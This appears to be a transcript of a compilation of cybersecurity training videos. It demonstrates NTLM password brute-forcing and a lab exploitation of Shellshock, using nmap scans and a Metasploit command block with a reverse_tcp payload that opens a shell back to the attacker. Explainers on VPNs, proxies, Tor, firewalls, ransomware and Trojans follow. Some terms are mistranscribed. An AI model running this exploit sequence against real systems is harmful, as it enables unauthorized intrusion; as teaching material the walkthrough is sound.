Let's try a brute-force attack. NTLM is the hashing mechanism used by Windows, so we're going to set up an attack against the NTLM hashes, and here we're going to use a predetermined rule set. For example, since we're not sure what characters are being used, we just create an attack using all characters: lowercase a through z, uppercase A through Z, numerics 0 through 9, and all the special characters. Let's say the password is between 7 and 16 characters, and this is the character set we want to run the brute-force attack over. What is a brute-force attack? It is an attack where the computer tries each and every permutation and combination from this character set to figure out the correct password. If we click start, it begins working through candidates, testing each against the NTLM hashes, and you can see the time estimate is phenomenal. So while the attack is viable in the sense that it will be 100% successful given enough time, the time frame is huge enough to make it somewhat redundant in practice. There are other attacks that can recover this data much more easily, but that is something we will look at in future videos. So that's how we can get access to users and passwords.

There are different mechanisms for the situation where we don't have login access: how can we create a fake user login, or remotely access a machine and try to get the same access? That is what we are going to try in the next demo, on a Linux machine; what we do on the Linux machine could also be done on a Windows machine with a different exploit. So this is the Linux web server that I'm going to power on. I'm going to use a Kali Linux machine to hack that device, and I'll power off my Windows 7 machine. Give it a minute until it boots up. This is also a demo machine with its own preconfigured vulnerabilities: it is from PentesterLab and has a Shellshock vulnerability implemented inside. The Shellshock vulnerability affects Linux, Mac, and Unix-based operating systems running particular versions of the Bash shell; Bash is the Bourne Again Shell, the command line interface on these operating systems. What we are going to do is use the Kali Linux machine to find the vulnerability, and if it exists, use Metasploit to attack this machine.

First and foremost, we want to identify the IP address of the target. We have no idea what it is, but we are in the same subnet, so we assume we can reach the machine. I'm going to open up a tool called Zenmap, then open a command line to find out my own IP address: my IP address is 192.168.71.128, with a subnet mask of 255.255.255.0. So I want to see whether there are any other live machines in the same subnet, and we do a ping sweep to identify which machines are up. In a minute we get all the IP addresses: 192.168.71.1, .2, .133, .254, and .128. We know that we are .128, and .254 is the DHCP server, so we assume .133 is the machine we want to look at. Let's then scan .133: we do an intense scan to find out which ports are open, what services are running there, and whether it is the PentesterLab machine we were looking for.
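For reference, the equivalent of those two Zenmap actions from a plain terminal (Zenmap's "Intense scan" profile corresponds roughly to these nmap flags):

```bash
# Ping sweep: list live hosts on the /24 without port-scanning them
nmap -sn 192.168.71.0/24

# Intense scan of the suspected target: timing template 4, plus OS and
# version detection, default scripts, and traceroute (-A bundles these)
sudo nmap -T4 -A -v 192.168.71.133
```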
You can see, at the start, ports 22 and 80, and further down it gives us the open ports and the details about them, and somewhere here it tells us that this is the PentesterLab machine we wanted, which is correct. Now we want to do a vulnerability analysis on this. I'm going to use another GUI-based tool called Sparta; Sparta uses two tools in the background, the Nmap tool and a tool called Nikto. We're just going to start scanning: 192.168.71.133 was the IP address, add it to scope, and over a period of time you can see all of these panes start populating with information. There we are, that's the Nikto tool coming in, scanning on port 80, which means it's a web server using HTTP. It tells us it's an Apache httpd 2.2.21 and gives us the port 22 details as well. If we look at the screenshot first, this is what the website looks like, and in the Nikto tab, Nikto tells us that there is a Shellshock vulnerability here and shows the path where the vulnerability exists.

So what do we do? We go back to the command line, open up a new window, minimize all the other windows, and open up Metasploit. Metasploit is the penetration testing tool used by most hackers and ethical hackers to test applications against existing exploits and vulnerabilities. Just give it a minute until it starts; you can see there are already around 1,700 exploits in this version. We can list all those exploits with the show exploits command (there we are, sorry for the typo), and it gives us all the exploits stored in this version of Metasploit. All of the ones on screen are Windows-based; if we scroll up, we see other exploits as well: Unix exploits, Linux, OS X, multi-platform exploits. We're looking for a multi-platform exploit for Apache over HTTP. Let's scroll up; this is the one we're looking for: the Apache mod_cgi Bash environment variable code execution exploit. So we just copy it, go back to the bottom, type use exploit and paste the module path, press enter, and say show options so it asks us what to configure. I'm going to configure it based on the knowledge we have: set the remote host, the victim's machine, by putting in its IP address. It asks us for the target URI, which is the path that we saw, so we set the target URI to /cgi-bin/status and press enter.

Now, with the exploit, we need a payload that gives us the output we want. We say show payloads, and it gives a list of all the payloads compatible with this exploit. We want to create a reverse TCP connection, and we know it's a Linux operating system, so we set that payload: set payload, press enter, that's the payload coming in, then show options. Now that we have set the payload, we see the options for the exploit, and we also want to set the options for the payload. We are creating a reverse TCP connection, which means we are remotely executing code on the victim's side and making the victim connect back to our machine, so we need to set up a listener. I need to put my IP address in here: set local host, or LHOST, to 192.168.71.128, which was our IP address. Show options again, just to ensure everything is fine, which it is, and we then type in the word exploit so that it starts the attack. The full command sequence is sketched below.
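For reference, here is the same sequence as a single scripted msfconsole invocation. The module path and option names match current Metasploit releases (older versions use RHOST rather than RHOSTS, so check show options on your install); the two addresses are the lab VMs from this demo:

```bash
msfconsole -q -x "
  use exploit/multi/http/apache_mod_cgi_bash_env_exec;
  set RHOSTS 192.168.71.133;
  set TARGETURI /cgi-bin/status;
  set PAYLOAD linux/x86/meterpreter/reverse_tcp;
  set LHOST 192.168.71.128;
  exploit"
```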
victim site and it has opened up a session so if I do a pwd now pwd is a Linux command for present working directory and it will show us that we’ll connect it to where dubdubdub cgi- bin do an ls it will list all the files that’s the status file over there do a cd backslash it will take us to the root of this machine and if you’re someone who is interested in building a career in cyber security that is by graduating from the best universities or a professional who sits to switch careers with cyber security by learning from the experts then try giving a short to simply learns post-graduate programming cyber security with modules from the MIT Schwarzman College of Engineering and the course link is mentioned in the description box that will navigate you to the course page where you can find a complete overview of the program being offered jude is waiting at the airport to hop on her flight back home when she realizes that she missed making an important bank payment she connects her laptop to the public Wi-Fi at the airport and goes ahead to carry out the bank transaction everything goes well and Jude completes her transaction after a couple of days she was wiped off her feet when she learned that her bank account was subjected to a cyber attack and a hefty amount was wiped from her account after getting in touch with the bank authority she learned that her account was hacked at the airport she then realized that the public Wi-Fi she used might have caused her this trouble jude wishes that had her bank transfer escaped the hacker’s eyes she would not have been a victim of a cyber attack bank officials advise her to use a VPN for future transactions especially when connecting to an open or public network like most of us Jude had come across the term VPN several times but didn’t know much about it and little did she think that the repercussions of not using a VPN would be this bad let’s understand how the hacker would have exploited Jude’s transaction in the absence of a VPN in this process Jude’s computer first connects to the internet service provider ISP which provides access to the internet she sends her details to the bank’s server using her IP address internet protocol address or IP address is a unique address that recognizes a particular device be it a laptop or smartphone on the internet when these details pass through the public network the hacker who passively watches the network traffic intercepts it this is a passive cyber attack where the hacker collects Jude’s bank details without being

More often than not, in such an attack payment information is likely to be stolen; the targeted data here are the victim's usernames, passwords, and other personal information. Such an unsecured connection exposed Jude's IP address and bank details to the hacker as they passed through the public network.

So would Jude have been able to secure her transaction with the help of a VPN? Well, yes. Picture Jude's bank transaction happening in a tunnel that is invisible to the hacker: in such a case, the hacker cannot spot her transaction, and that is precisely what a VPN does. A virtual private network, more often known as a VPN, creates a secure tunnel between your device and the internet. To use a VPN, Jude's first step would be to install software known as a VPN client on her laptop or smartphone, which lets her establish a secure connection. The VPN client connects to the Wi-Fi and then to the ISP. Here the VPN client encrypts Jude's information using VPN protocols; data is encrypted to make sure it is secure. Next, the VPN client establishes a VPN tunnel within the public network that connects to the VPN server; this tunnel protects Jude's information from being intercepted by the hacker. Jude's IP address and actual location are changed at the VPN server to enable a private and secure connection. Finally, the VPN server connects to Jude's bank server in the last step, where the encrypted message is decrypted.

This way, Jude's original IP address is hidden by the VPN, and the VPN tunnel protects her data from being hacked. That explains how a VPN makes your data anonymous and secure when it passes through a public network, and the difference between a normal connection and a VPN connection. After learning about this, Jude was certain that she should start using a VPN to carry out her online transactions in the future. This applies to each one of us too: whether you work remotely or connect to public Wi-Fi, using a VPN is the safest option. In addition to providing secure, encrypted data transfer, VPNs are also used to disguise your whereabouts and give you access to regional web content. VPN servers act as proxies on the internet, so your actual location cannot be established; a VPN enables you to spoof your location by switching to a server in another country, and thereby change your apparent location. By doing so you can, for example, watch content on Netflix that might be unavailable in your region.
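A quick way to see this IP change for yourself is to ask a "what is my IP" service before and after connecting your VPN client. A minimal sketch, assuming curl is installed and using ifconfig.me as the lookup service (any similar service works):

```bash
#!/bin/bash
# Print the public IP address the rest of the internet sees for this machine.
# Run once before and once after connecting your VPN client: the two
# addresses should differ, since traffic now exits from the VPN server.
echo "Public IP: $(curl -s ifconfig.me)"
```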
Meet Jonathan. He is an investigative journalist who occasionally researches and publishes news articles contrary to the government's ideologies. On one such occasion he could not access a global news website dealing with uncensored information; it seemed his IP was blocked from visiting the site. With his IP blocked, Jonathan turned to a popular proxy service that was able to unblock the news website, thereby allowing an open internet to all users. Just like a friend who gives proxy attendance for you, a proxy server serves as a stand-in that keeps the real client private.

But what is a proxy? Let's understand how it works by looking at how Jonathan was able to access geo-blocked content without much hassle. A proxy server acts as a gateway, an intermediary server between a user and the destination website. When Jonathan wasn't able to access the news website, he connected his system to a global proxy server. Once connected, the proxy server assigns a new IP address to Jonathan's system: an IP address of a different country, where the website is not censored. Following this process, whenever Jonathan visits that website, the website administrators see the new IP address assigned via the proxy server and see no reason to deny access. Once the proxy server is able to access the website, the content is passed on to Jonathan's system via the same channel.

Regarding accessibility, you must first set a proxy up on your computer, device, or network. Check the steps required for your platform, as each operating system has its own setup procedure; in most cases, however, setup entails using an automated configuration script. There are plenty of free proxy services available on the internet, but the safety of such proxies is rarely verified. Most free proxies will simply provide an IP address and a relevant port for connection purposes. Reputed proxy providers like Smartproxy and Bright Data, which run on subscription models, will most likely provide credentials to log in with when establishing the connection; this extra step acts as authentication that verifies an existing subscription on the provider's server, unlike free providers that are open to all.

When it comes to hiding IP addresses, many people consider a VPN to be the primary solution. While that's true to some extent, there are a few things proxies do differently. In the case of a VPN, extra encryption is carried out to create a secure tunnel between the user's device and the VPN server; a VPN is usually much faster, more secure thanks to multiple layers of encryption, and has little to no downtime. Proxies tend to be comparatively unsafe, with the service owners knowing the exact IP address of the end user and offering no guarantees regarding downtime and reliability.

Now let's take a small quiz to check how much we have learned. What can a VPN connection provide that a proxy service cannot: (a) a new IP address, (b) multiple layers of encryption, (c) access to geo-blocked content, or (d) authentication credentials? Think it over.

What about the benefits of a proxy service, though? Besides allowing access to blocked content, proxies can serve as an efficient firewall system. They can also filter content from third-party websites, allowing control over internet usage. In many cases browsing speeds are stabilized compared to vanilla internet access, thanks to proper optimization of the underlying proxy server. The element of privacy proxies provide is highly attractive to people looking to hide their actual IP address from as many prying eyes as possible. One can easily argue the benefits of using VPNs over proxies for added security, but a few basic tasks don't warrant maximum privacy on the user's side. For example, many consumers worldwide find proxy services more convenient, since all major operating systems, from Windows to Android, allow proxy configuration without the hassle of installing new applications, as is the case with a VPN. In addition, there are services online that function as web proxies, allowing users to access blocked content without any setup on their end: they enter the target URL, and the web proxy routes data from its own physical server. This level of freedom is hard to come by with VPNs, making proxies an ideal solution for casual browsing.
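On Linux, many command-line tools respect the standard proxy environment variables, so pointing a shell session at a proxy takes only a couple of lines. A hedged sketch: the host, port, and credentials below are placeholders, not a real service.

```bash
#!/bin/bash
# Route this shell session's HTTP(S) traffic through a proxy.
# proxy.example.com:8080 and the user:pass pair are placeholders.
export http_proxy="http://user:pass@proxy.example.com:8080"
export https_proxy="$http_proxy"

# Tools such as curl and wget honor these variables; the IP reported
# here should now be the proxy's address, not your own.
curl -s ifconfig.me
```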
With the next generation of internet exchanges focused on maximum privacy and security, a variety of ways have been devised to maintain them. Censorship, meanwhile, has shifted from the streets to the digital domain, forcing the standard citizen to find alternative ways to maintain anonymity. A major weapon in this battle for privacy and security is the Tor browser, an independent browser meant to browse the internet while relaying information through the Tor network. It serves as a meaningful alternative to standard internet browsing habits. To understand the purpose of this browser, you must first learn about the workings of the Tor network. Featuring its own routing protocol, the Tor browser is an easy way to maintain anonymity while browsing without emptying one's wallet.

Let's take a look at the topics to be covered. We start with an explanation of what the Tor network is and its significance in the working of the Tor browser. We take a look at the onion routing protocol and how it transmits data from client devices to the Tor directories in order to circumvent government censorship. Moving on, we learn a few features of the Tor browser and the distinct advantages the Tor network provides. Next we learn the difference between using a VPN and using Tor to anonymize internet usage, and finally we have a live demonstration of the Tor browser's anonymization features in action.

Let's move on to the Tor network. Tor, short for The Onion Router, is an open-source privacy network that permits users to browse the web anonymously. Tor was initially developed and solely used by the US Navy to protect sensitive government communications before the network was made publicly available. The digital era has disrupted the traditional way of doing things in every sector of the economy, and the rapid rise in development and innovation of digital products has given way to frequent data breaches and cyber thefts. In response, consumers are increasingly opting for products that offer data privacy and cyber security. Tor is one such underground network implemented to protect users' identities, one example of the many emerging technologies that attempt to fill a data-privacy void in a digital space plagued by cyber-security concerns.

The Tor network intercepts the traffic from your browser and bounces a user's request off a random number of other users' IP addresses before passing it to the requested final destination. These random users are volunteer devices called nodes or relays. The Tor network disguises your identity by encrypting the traffic and moving it across different Tor relays within the network, using an onion routing technique for transmitting data, hence the name The Onion Router. To operate within the Tor network, a user has to install the Tor browser; any address or information requested using the browser is transmitted through the Tor network. The browser has its own feature set, which we will go over later.

As discussed, the data passing through the Tor network follows a unique protocol known as the onion routing protocol, so let us learn more about its characteristics. In normal network usage, data is transmitted directly: the sender has data packets to transmit, which travel directly over a line of communication to either a receiving party or a server of some kind. However, since the data can easily be captured while being transmitted, the security of this exchange is not very reliable; moreover, it becomes very easy to trace the origin of such requests on many occasions.
Websites with questionable or controversial content get blocked at the ISP, which is possible because the ISP can detect and inspect user information passing through its network. Apart from ISPs, there is a steady chance of your private information being intercepted by hackers. Unfortunately, easy detection of the source and contents of a web request makes the entire network extremely vulnerable for people who seek anonymity over the internet.

In the onion routing protocol, however, things take a longer route. We have a sender with the Tor browser installed on the client system. The client wraps the request in layers of encryption and sends it to node 1's IP address; node 1 removes the outermost layer and passes the data on to node 2's address, which removes another layer and passes it on to node 3's address. This last node, also known as the exit node, removes the final layer of encryption and relays the request to the final destination, which can be another device or a server. The destination thinks the request came from the exit node and grants access to it; on the way back, the response is re-encrypted layer by layer from the exit node to the original user. The Tor network thus obfuscates user IP addresses from unwanted surveillance by keeping each user's request untraceable; with multiple servers touching the data, tracking becomes very difficult for both ISPs and malicious attackers.
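To make the layering concrete, here is a toy illustration in Bash using OpenSSL. This is not the real Tor protocol (Tor negotiates per-hop session keys and uses its own cell format; the passphrases here are stand-ins), just a sketch of how a message wrapped in three layers is peeled one layer per node:

```bash
#!/bin/bash
# Toy model of onion routing: the client wraps the request in three
# layers of encryption; each relay strips exactly one layer.
echo "GET /news-article HTTP/1.1" > request.txt

# Client: innermost layer for the exit node, outermost for node 1
openssl enc -aes-256-cbc -pbkdf2 -pass pass:exitkey  -in request.txt -out layer3.bin
openssl enc -aes-256-cbc -pbkdf2 -pass pass:node2key -in layer3.bin  -out layer2.bin
openssl enc -aes-256-cbc -pbkdf2 -pass pass:node1key -in layer2.bin  -out layer1.bin

# Node 1, node 2, and the exit node each peel one layer in turn
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:node1key -in layer1.bin -out peel1.bin
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:node2key -in peel1.bin  -out peel2.bin
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:exitkey  -in peel2.bin  # prints the original request
```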
Now that we understand how Tor works, let us learn more about the Tor browser. The Tor browser was developed by a nonprofit organization as part of the Tor Project, and its first public release was announced in 2008. It is a fork of the popular Firefox browser that anonymizes your web traffic using the Tor network. If you're investigating a competitor, researching an opposing litigant in a legal dispute, or just think it's creepy for your ISP or the government to know what websites you visit, the Tor browser might be the right solution. Before the Tor browser was developed, using the Tor network to maintain anonymity was a huge task for everyday consumers: from setup to usage, the entire process demanded a lot of knowledge and practice. The Tor browser made it easy for users to traverse Tor's relay servers and guarantee the privacy of the data exchange.

A major feature of the Tor browser is its ability to delete all browser history, cookies, and tracking data the moment it is closed; every new launch of the browser opens with an empty slate, keeping your usage habits from being tracked and singled out. Another highlight of the Tor network is the availability of onion links. Only a small portion of the worldwide web is available to the general public: the deep web contains links that are not indexed by standard search engines like Google and Bing, and the dark web is a further subset of the deep web that contains onion links. The Tor browser gives you access to these onion websites, which are only reachable within the Tor network. .onion is a special-use top-level domain that designates an anonymous onion service, also known as a hidden service. Similar to the links of the deep web, these onion links provide services like online shopping, cryptocurrency, and many other products not available in the consumer internet space; often considered a haven for illegal activities and sales, onion links provide both information and assets in a private manner without the risk of spying by authorities.

Browsing the web over Tor is slower than the clear net due to the multiple layers of encryption, and some web services also block Tor users. The Tor browser is likewise illegal in authoritarian regimes that want to prevent citizens from reading, publishing, and communicating anonymously. Journalists and dissidents around the world have embraced Tor as a cornerstone of democracy, and researchers are hard at work improving Tor's anonymity properties.

Let us take a look at some of the advantages of using the Tor browser over standard web browsers. The highlight of the Tor browser is maintaining anonymity over the internet; the reasons for wanting this differ from person to person, but all of them are answered by the Tor network. Routing information via multiple nodes and relay servers makes it very difficult for the ISP to keep track of usage data. The entire Tor Project is designed to be completely free and open source, and allowing the code for the browser to be inspected and audited by third parties helps in the early detection of faulty configurations and critical bugs. It is available for multiple operating systems, from laptops to mobile devices. A number of websites are blocked by governments for a variety of reasons, and journalists under authoritarian regimes have difficulty getting the word out; since the onion routing protocol transfers data between servers in random countries, blocked domains become available when accessed via Tor, and encrypted messaging platforms are easily reached using the Tor browser, which would otherwise be difficult under oppressive circumstances.

Many people believe that a VPN offers the same benefits as the Tor browser, so let's put both to the test and see the differences between them. On the first point of difference, Tor is completely free and open source: all of the code for the browser and the network can be audited and has been cleared of security concerns. Among VPNs, many brands have open-source clients, but the same cannot be said for their server-side counterparts; some are partly open source, while others have completely locked up their code. Moving on, Tor has multiple relay points in its data-transfer protocol: between the sender and the receiver there are at least three different IP nodes (the number can increase, but it will always be more than two), and once the data leaves the sender it passes through all of those relay points. With a VPN, the connection is made from the client device to the VPN server and then to the requested destination; no other IP node comes into play, making it a one-to-one connection between the client and the VPN. Next, since Tor handles multiple layers of encryption and the data passes through multiple systems along the way, performance is slow compared to a VPN, where performance is relatively fast thanks to the smaller number of hops. Similarly, Tor's multi-layer encryption is consistent: every single request from the Tor browser passes through the same layers of encryption and follows the same routing protocol, whereas different VPN companies offer different levels of encryption (some have multi-hop, some prefer a single one-to-one connection), which makes the choice much more variable. Finally, the nodes and relays used in the Tor network are run by volunteers, with no single company holding control over them, so no single jurisdiction has a hold over the network; many VPNs, by contrast, are hosted by adware companies or are monitored by central governments that record usage information.
Now that we have a better understanding of the Tor browser and its routing, let us take a look at how the Tor browser can anonymize and protect our internet usage. On opening the Tor browser for the first time, this is the page that welcomes you, with the option of connecting to the Tor network before we start browsing; we press Connect and can see that it is connected. Coming to the anonymization, let's first check my current location in Google Chrome: it currently shows as Navi Mumbai, in Maharashtra. If we check the same link in the Tor browser, we should get a different address. Every link we open in the Tor browser will be a little delayed, and speed will be hampered because of the multiple layers of encryption we discussed. As you can see, it now shows a German IP in the state of Bavaria. This is how the anonymization works: there is no VPN configured and no proxy attached; it's straight-up the out-of-the-box settings that come built into the Tor browser.

Similarly, we have an option of cleaning up the data. Say you want to refresh your location and use a different identity for the next browsing session: just restart the browser once, check again, and we should see a different country. This time, as you can see, we have the Netherlands. This is how you can keep refreshing your apparent address and host location so that you cannot be tracked while browsing the internet.

As we discussed, there are onion links that can only be used on the Tor network. These kinds of links do not open in the Google Chrome browser, but once we copy them over to the Tor browser, you can see we have opened the Hidden Wiki, which is available only on the Tor network; it is a kind of alternative Wikipedia where we can find articles to read and more information to learn. Similarly, we have another onion link here which is, once again, available only in the Tor browser. These kinds of delays are expected, but they are a valid compromise because they maintain the anonymity that many people desire. We also found a hidden wallet, a cryptocurrency wallet specifically for dark-web users; it operates over the Tor network and is used mostly by journalists and people who want to anonymize their internet transactions when it comes to money. Transactions that occur over the Tor network are almost impossible to track, so these kinds of cryptocurrency wallets are very big on the deep web; this is just one example, and there are multiple different wallets for every cryptocurrency available.
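You can reproduce the location check from this demo on the command line. When a Tor instance is running it exposes a SOCKS proxy, by default on 127.0.0.1:9050 (the Tor browser's bundled instance typically listens on 9150 instead); the check.torproject.org endpoint below returned JSON at the time of writing, so treat the exact output format as an assumption. A sketch:

```bash
#!/bin/bash
# Compare your direct public IP with the IP seen when traffic is
# routed through a locally running Tor instance (SOCKS on port 9050;
# the Tor Browser bundle usually listens on 9150 instead).
echo "Direct:  $(curl -s ifconfig.me)"
echo "Via Tor: $(curl -s --socks5-hostname 127.0.0.1:9050 ifconfig.me)"

# check.torproject.org also reports whether your exit is a Tor node
curl -s --socks5-hostname 127.0.0.1:9050 https://check.torproject.org/api/ip
```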
Imagine our houses without a fence or boundary wall. That would make our property easily accessible to trespassers and robbers, placing our homes at great risk, right? Fencing our property helps safeguard it and keeps trespassers at bay. Similarly, imagine our computers and networks without protection: that would increase the probability of hackers infiltrating them. To overcome this challenge, just as boundary walls protect our houses, a virtual wall helps safeguard and secure our devices from intruders; such a wall is known as a firewall. Firewalls are security devices that filter the incoming and outgoing traffic within a private network.

For example, if you were to visit a friend who lives in a gated community, you would first take permission from the security guard. The guard would check with your friend whether you should be allowed entry; if all is well, your access is granted. On the other hand, the guard would not grant permission to a trespasser looking to enter the same premises. Entry access depends solely on the resident's discretion, and the role of the security guard is similar to that of a firewall. The firewall works like a gatekeeper at your computer's entry point, welcoming only the incoming traffic it has been configured to accept. Firewalls filter the network traffic within your network and analyze which traffic should be allowed or restricted, based on a set of rules, in order to spot and prevent cyber attacks.

Your computer communicates with the internet in the form of network packets that hold details like the source address, the destination address, and the payload, and these packets enter your computer through ports. The firewall applies a set of rules based on the details of these network packets, such as their source address, destination address, content, and port numbers, and only trusted traffic sources or IP addresses are allowed to enter your network. When you connect your computer to the internet, there is a high chance of hackers infiltrating your network. This is when a firewall comes to your rescue, acting as a barrier between your computer and the internet: it rejects malicious data packets and thus protects your network from hackers, while traffic from trusted websites is allowed in. In this way the firewall carries out quick assessments to detect malware and other suspicious activity, protecting your network from being susceptible to a cyber attack.

Firewalls can be either hardware or software. Software firewalls are programs installed on each computer, also called host firewalls, while hardware firewalls are appliances placed between the gateway and your network; routers are a good example of a hardware firewall. Besides this, there are other types of firewalls classified by their traffic-filtering method, structure, and functionality. A firewall that compares each outgoing and incoming network packet to a set of established rules, such as allowed IP addresses, IP protocols, port numbers, and other aspects of the packet, is known as a packet-filtering firewall; if the incoming traffic does not match the permitted rules, that traffic is blocked. A variant of the packet-filtering firewall is the stateful inspection firewall: these not only examine each network packet but also check whether that packet is part of an established network connection, which is why they are also referred to as dynamic packet-filtering firewalls. Our next type is the proxy firewall, which draws a close comparison to giving proxy attendance for a friend: just as you take the authority to represent your friend, the proxy firewall pretends to be you and interacts with the internet on your behalf. It sits between you and the internet and prevents direct connections, which protects your device's identity and keeps the network safe from potential attacks; only if the incoming data packet's contents are verified does the proxy firewall pass them on to you. Proxy firewalls are also known as application-level gateways. A firewall can thus spot malicious actions and block your computer from receiving data packets from harmful sources.
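On a Linux host, the built-in packet filter can be configured from Bash. A minimal sketch of such a rule set using ufw, the Uncomplicated Firewall front end; the subnet below is a documentation placeholder, not a recommendation:

```bash
#!/bin/bash
# Example host-firewall policy using ufw.
# 203.0.113.0/24 is a documentation address range used as a placeholder.
sudo ufw default deny incoming     # drop everything not explicitly allowed
sudo ufw default allow outgoing
sudo ufw allow 80/tcp              # accept web traffic on port 80
sudo ufw allow from 203.0.113.0/24 to any port 22 proto tcp  # SSH from a trusted subnet only
sudo ufw enable
sudo ufw status verbose            # review the active rule set
```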
In addition to preventing cyber attacks, firewalls are also used in educational institutions and offices to restrict users' access to certain websites or applications and to block unauthorized content.

It's the year 2015, and Richard has just finished playing games on his computer. After a long gaming session, Richard tries to shut it down but finds a random text file on the desktop that says "ransom note." The text file explains how a hacking group has encrypted Richard's game files and private documents, and that he has to pay a ransom of $500 worth of Bitcoin to a specified Bitcoin address. Richard quickly checks his files, only to find them encrypted and unreadable. This is the story of how the TeslaCrypt ransomware spread in 2015, affecting thousands of gamers before the master key used for encrypting the files was released.

So what is ransomware? For Richard to be targeted by such an attack, he must have installed applications from untrusted sources or clicked an unverified link; both can function as gateways for a ransomware breach. Ransomware is a type of malware that encrypts personal information and documents while demanding a ransom to decrypt them. The ransom payment is mainly made using cryptocurrency to ensure anonymity, but other routes exist. Once the files are encrypted or locked behind a password, a text file is left for the victim explaining how to make the ransom payment and unlock the files, just like the ransom note Richard found on his desktop. Even after the money has been paid, there is no guarantee that the hackers will send the decryption key or unlock the files, but in certain sensitive situations victims make the payment hoping for the best. Having never encountered ransomware attacks before, Richard took the opportunity to learn more, and he began his research on the topic.

The spread of ransomware mostly starts with phishing attacks: users click unknown links received via email or chat applications promising rewards of some nature, and once clicked, the ransomware installs on the system and encrypts all the files or blocks access to computer functions. Ransomware can also spread via malware transmitted through untrusted application installs or even a compromised wireless network. Another way to breach a system with ransomware is through Remote Desktop Protocol (RDP) access: a computer can be accessed remotely using this protocol, allowing a hacker to install malicious software on the system with the owner unaware of these developments.

Coming to the different types of ransomware: first we have locker ransomware, a type of malware that blocks standard computer functions until the payment to the hackers is complete; it shows a lock screen that doesn't allow the victim to use the computer for even basic purposes. Another type is crypto ransomware, which encrypts the local files and documents on the computer; once the files are encrypted, finding the decryption key is practically impossible unless the ransomware variant is old and the keys are already available on the internet. Scareware is fake software that claims to have detected a virus or other issue on your computer and directs you to pay to resolve the problem; some types of scareware lock the computer, while others simply flood the screen with pop-up alerts without actually damaging files.

To avoid being affected by ransomware, Richard could have followed a few steps to further enhance his security. One must always have backups of one's data: cloud storage for backup is easy, but a physical backup on a hard drive is always recommended. Keeping the system updated with the latest security patches is always a good idea, and beyond system updates one should have reputable antivirus software installed; products like Kaspersky and Bitdefender have anti-ransomware features that periodically check for unexpected encryption of private documents. When browsing the internet, always check for the lock symbol in the address bar, which signifies the presence of the HTTPS protocol, for additional security. And if a system is already infected with ransomware, the website nomoreransom.org hosts a collection of decryption tools for most well-known ransomware families; it can also help decrypt specific encrypted files if the list of anti-ransomware tools did not help the victim.
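Since offline backups are the single most effective defense listed above, here is a minimal Bash sketch of a dated backup to an external drive. The paths are placeholders for wherever your drive mounts:

```bash
#!/bin/bash
# Copy the home directory to a dated folder on an external drive.
# /mnt/backup is a placeholder mount point; adjust for your system.
SRC="$HOME"
DEST="/mnt/backup/$(date +%Y-%m-%d)"

mkdir -p "$DEST"
# -a preserves permissions and timestamps; --delete is deliberately omitted
# so older snapshots are never silently destroyed by a compromised source.
rsync -a "$SRC/" "$DEST/"
echo "Backup written to $DEST"
```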
Malware is malicious software programmed to cause damage to a computer system, network, or hardware device. Malicious programs like Trojans, viruses, logic bombs, and bots that damage a system are collectively known as malware. Most malware is designed to steal information from the targeted user, or to steal money from the target by stealing sensitive data. Let's take an introductory look at two different types of malware: the virus and the Trojan.

First, what exactly is a virus program? A computer virus is a type of malicious program that replicates itself on execution. Viruses attach themselves to different files and programs, termed host programs, by inserting their code; if the attachment succeeds, the targeted program is termed infected with a computer virus. Now let's look at the Trojan horse. A Trojan horse is a program that disguises itself as a legitimate program but harms the system on installation. Trojans hide within attachments and emails and transfer from one system to another, creating backdoors into our system that allow cyber criminals to steal our information.

Let's see how each functions after getting installed on a system. First, virus programs: a computer virus must contain two parts to infect a system. The first is a search routine, which locates new files and data to be infected by the virus program; the second is the copy routine, which the program needs in order to copy itself into the targeted file located by the search routine. As for the Trojan horse, its entryway into our system is through emails that may look legitimate but carry unknown attachments; when such files are downloaded onto the device, the Trojan program gets installed and infects the system. Trojans also infect the system upon execution of an infected application or executable file.

Now that we understand what viruses and Trojans are, let's go through the different types of each, starting with viruses. The first is the boot sector virus. This type of virus damages the booting section of the system by infecting the master boot record (MBR), targeting the hard disk and damaging the boot sector. Then we have the macro virus, a type of virus embedded in document-related data that executes when the file is opened; macro viruses are also designed to replicate themselves and infect the system on a larger scale. And lastly we have the direct action virus, which attaches itself to executable files and activates when those files are executed; once the infection of the file is complete, it exits the system, which is why it is also known as a non-resident virus.
Now the types of Trojans. The first type is the backdoor Trojan, designed to create a backdoor in the system when an infected program is executed; it provides a hacker remote access to the system, and in this way the cyber criminal can steal our system's data and use it for illegal activities. Next we have the Cricost Trojan, which enters the system through the random pop-ups we come across on the internet; it tempts the user into giving personal details for various transactions or schemes, which may hand remote access of the system to the cyber criminal. And the last Trojan type is the ransom Trojan: after entering the system, this type of Trojan blocks the user from accessing their own system and degrades its functioning, and the cyber criminal demands a ransom from the targeted user for removal of the Trojan program from the device.

Now that we understand some details regarding viruses and Trojans, let's solve a question. Jake was denied access to his system, and he wasn't able to control the data and information in it. What could be the reason behind his system's problem: option A, a macro virus; option B, a ransom Trojan; or option C, a backdoor Trojan?

Next, let's understand how to detect virus and Trojan activity on a system. For viruses: slowing down of the system and frequent application freezes indicate that a virus infection is present. Viruses can also steal sensitive data, including passwords and account details, which may show up as unexpected logouts from accounts or corruption of sensitive data. And frequent system crashes occur when a virus infection damages the operating system. For Trojans: the system crashes frequently and also responds slowly; there are more random pop-ups, which may indicate Trojan activity; and modification of system applications or a changed desktop appearance can also be due to a Trojan infection.

Next, a famous cyber attack for each. For the virus we have MyDoom, identified in the year 2004, which affected over 50 million systems by building a network for sending spam emails that was used to gain backdoor access into systems. For the Trojan horse we have the Emotet Trojan, designed specifically for financial theft and for stealing bank-related information.

Finally, a few points on preventing a virus or Trojan attack on a system. The most basic protection is to use an antivirus and run regular virus scans, which prevents viruses from entering the system; an occasional second opinion from an on-demand scanner can provide better coverage. Avoiding uncertified websites also prevents viruses from entering the system, as do regular driver updates and system updates. For Trojans: use certified software from legitimate sites to prevent Trojan activity on your system, avoid clicking the random pop-ups we so often see on the internet, and, lastly, using an antivirus and a firewall is a good habit for protection against Trojan horses.
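On Linux, one concrete way to run the "regular virus scan" mentioned above is the open-source ClamAV engine. A small sketch, assuming the clamav package is installed:

```bash
#!/bin/bash
# Refresh ClamAV's signature database, then recursively scan the home
# directory, printing only infected files plus a summary at the end.
sudo freshclam                 # update virus definitions
clamscan -r -i "$HOME"         # -r: recurse, -i: list infected files only

# clamscan exits with code 1 when at least one infection was found
if [ $? -eq 1 ]; then
    echo "Infections detected; review the report above."
fi
```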
